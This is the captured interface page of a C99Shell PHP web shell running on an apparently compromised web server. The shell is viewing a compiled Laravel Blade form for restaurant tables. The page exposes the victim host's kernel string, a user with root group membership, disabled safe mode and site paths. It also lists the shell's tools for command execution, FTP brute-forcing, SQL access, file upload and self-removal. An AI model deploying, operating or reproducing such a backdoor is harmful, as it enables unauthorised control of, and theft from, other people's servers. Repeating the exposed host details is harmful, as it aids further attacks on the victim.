!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/qr.picotech.app/public_html_v3_3/storage/framework/views/   drwxr-xr-x
Free 25.3 GB of 117.98 GB (21.45%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     76c725b3c67dbcfa513ca2cc4b93f0415dd215df.php (3.25 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php echo csrf_field(); ?>
<div>
    <section>
        <div class="row">
            <div class="col-lg-12 mb-2">
                <div class="form-group">
                    <label class="text-label"><?php echo e(trans('layout.restaurant')); ?>*</label>
                    <select name="restaurant_id" class="form-control">
                        <?php $__currentLoopData $restaurants$__env->addLoop($__currentLoopData); foreach($__currentLoopData as $restaurant): $__env->incrementLoopIndices(); $loop $__env->getLastLoop(); ?>
                            <option
                                <?php echo e(isset($table) && $table->restaurant_id==$restaurant->id?'selected':''); ?> value="<?php echo e($restaurant->id); ?>"><?php echo e($restaurant->name); ?></option>
                        <?php endforeach; $__env->popLoop(); $loop $__env->getLastLoop(); ?>
                    </select>
                </div>
            </div>
            <div class="col-lg-6 mb-2">
                <div class="form-group">
                    <label class="text-label"><?php echo e(trans('layout.name')); ?>*</label>
                    <input value="<?php echo e(old('name')?old('name'):(isset($table)?$table->name:'')); ?>" type="text" name="name"
                           class="form-control" placeholder="Ex: Table-1" required>
                </div>
            </div>
            <div class="col-lg-6 mb-2">
                <div class="form-group">
                    <label class="text-label"><?php echo e(trans('layout.no_of_capacity')); ?>*</label>
                    <input
                        value="<?php echo e(old('no_of_capacity')?old('no_of_capacity'):(isset($table)?$table->no_of_capacity:'')); ?>"
                        type="number" name="no_of_capacity"
                        class="form-control" placeholder="Ex: 6" required>
                </div>
            </div>
            <div class="col-lg-6 mb-2">
                <div class="form-group">
                    <label class="text-label"><?php echo e(trans('layout.position')); ?>*</label>
                    <input
                        value="<?php echo e(old('position')?old('position'):(isset($table)?$table->position:'')); ?>"
                        type="text" name="position"
                        class="form-control" placeholder="Ex: right-corner" required>
                </div>
            </div>

            <div class="col-lg-6 mb-2">
                <div class="form-group">
                    <label class="text-label"><?php echo e(trans('layout.status')); ?>*</label>
                    <select name="status" class="form-control">
                        <option <?php echo e(isset($table) && $table->status=='active'?'selected':''); ?>

                            value="active"><?php echo e(trans('layout.active')); ?></option>
                        <option <?php echo e(isset($table) && $table->status=='inactive'?'selected':''); ?>

                            value="inactive"><?php echo e(trans('layout.inactive')); ?></option>
                    </select>
                </div>
            </div>
        </div>
    </section>

</div>
<?php /**PATH /home/pcolfjqt/qr.picotech.app/resources/views/table/form.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0041 ]--